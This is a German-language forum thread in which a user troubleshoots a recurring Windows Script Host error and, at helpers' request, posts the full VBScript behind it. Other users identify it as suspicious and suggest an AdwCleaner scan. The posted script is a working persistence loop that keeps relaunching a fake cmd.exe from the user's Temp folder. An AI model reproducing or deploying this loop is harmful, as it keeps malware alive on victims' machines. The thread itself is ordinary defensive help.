Anzeige

Am Puls von Microsoft

Anzeige

[gelöst] Windows Script Host - "C:\Users\K" hat keine Dateierweiterung.

Rickenbacker

kennt sich schon aus
Hallo zusammen,

seit kurzem bekomme ich diese

9MHEHqXEpC8AAAAASUVORK5CYII=

Fehlermeldung angezeigt. OK anklicken nützt nichts, nach einigen Sekunden ist die Meldung wieder da. Im Ordner habe ich die Datei gelöscht, aber sie wird immer wieder erzeugt. Öffnen lässt sie sich nicht. Größe: 1K. Eigenschaften: es wird der ganze Benutzerordner angezeigt.

Wie bekomme ich das Ding weg?
:mad:



Danke!

R.
 

Anhänge

  • K.docx
    21 KB · Aufrufe: 114
Anzeige
Und warum bitte verpackst Du Deinen Screenshot in ein Word Dokument? Sowas hängt man fairerweise direkt an und zwingt die Leute nicht dazu, erst irgendwas downloaden zu müssen.

Irgendwas wird da wohl ein Script starten, das nicht korrekt geschrieben wurde. Denn die Fehlermeldung weist darauf hin, dass der übergebene Pfad nicht korrekt ausgewertet wird. Oder gibt es bei Dir den Ordner "C:\Users\K" (im Explorer wäre das der Ordner C:\Benutzer\K)? Ich gehe mal davon aus, dass es einen Ordner "C:\Benutzer\K irgendwas weiter" gibt, das Script am Leerzeichen nach "\K" scheitert und deshalb diese Fehlermeldung erbringt.

Der Taskmanager sollte auf dem Tab "Details" das Script nennen. Du kannst Dir dort mit einem Rechtsklick in den Spaltenkopf, über die Auswahl "Spalten auswählen", zusätzlich noch die Spalte "Befehlszeile" einblenden lassen. Die nennt dann auch den genauen Ort und Namen dieses Scriptes.
 
Vielen Dank, den Screenshot habe ich in ein Word-Dokument verpackt, weil ich es nicht anders weis (meine Talente liegen in anderen Bereichen). Wie im Titel beschrieben gibt es einen Ordner "C:\Users\K" wobei die Bezeichnungen "User" und "Benutzer" alternieren. "K irgendwas weiter" existiert allerdings nicht und hat auch früher nie existiert.

Das beschriebene Script habe ich gefunden, muss ich da etwas machen? Leerzeichen im Ordner "C:\Users\K " bringen nichts.

Danke

R.
 
Screenshots kannst du einfach mit dem in Windows 10 enthaltenen "Snipping Tool" erstellen und diese als .jpg oder .png abspeichern.

Zum Script, ist das ein von dir selbst geschriebenes? Was steht in dem Script, was soll damit bewirkt werden? Welche Benutzer gib es, sind bei den Benutzernamen evtl. Leerzeichen enthalten?
 
Nein, so etwas kann ich nicht schreiben, da ist Maya ja verständlicher. Keine Ahnung was es bewirken soll. Ich bin der einzige Benutzer. Die R R R stehen mit Leerzeichen als Klarname drin:

On error resume next
Dim strComputer,strProcess,fileset
strProcess = "cmd.exe"
fileset = """C:\Users\R R R\AppData\Local\Temp\cmd.exe"""
strComputer = "."
Dim objShell
Set objShell = CreateObject("WScript.Shell")
Dim fso
Set fso = CreateObject("Scripting.FileSystemObject")
while 1
IF isProcessRunning(strComputer,strProcess) THEN
ELSE
objShell.Run fileset
END IF
Wend
FUNCTION isProcessRunning(BYVAL strComputer,BYVAL strProcessName)
DIM objWMIService, strWMIQuery
strWMIQuery = "Select * from Win32_Process where name like '" & strProcessName & "'"
SET objWMIService = GETOBJECT("winmgmts:" _
& "{impersonationLevel=impersonate}!\" _
& strComputer & "\root\cimv2")
IF objWMIService.ExecQuery(strWMIQuery).Count > 0 THEN
isProcessRunning = TRUE
ELSE
isProcessRunning = FALSE
END IF
END FUNCTION


Was ist ein "Snipping Tool"?

Danke

R.
 
Script schaut für mich dubios aus.
Lade dir mal AdwCleaner herunter und mach einen Scan, nicht blind alles löschen, was gefunden wurde! Alles schön durchlesen und bei bekannten Dateien den Haken weg.
 
Sieht mir auch richtig übel aus, da wird cmd.exe umgeleitet.

https://docs.microsoft.com/en-us/windows/desktop/com/impersonation-levels
CIMV2
https://docs.microsoft.com/en-us/windows/desktop/wmisdk/creating-a-wmi-script

Das folgende Beispiel sollte passen, da wird ein Prozess gesucht:
https://stackoverflow.com/questions/48692926/vbscript-to-kill-ie-and-restart-with-screensaver
Und da cmd.exe nicht in c:\windows\system32 aufgerufen wird, ist das sehr verdächtig, allein schon, wegen User "k...", den es bei dir nicht gibt.
 
Anzeige
Oben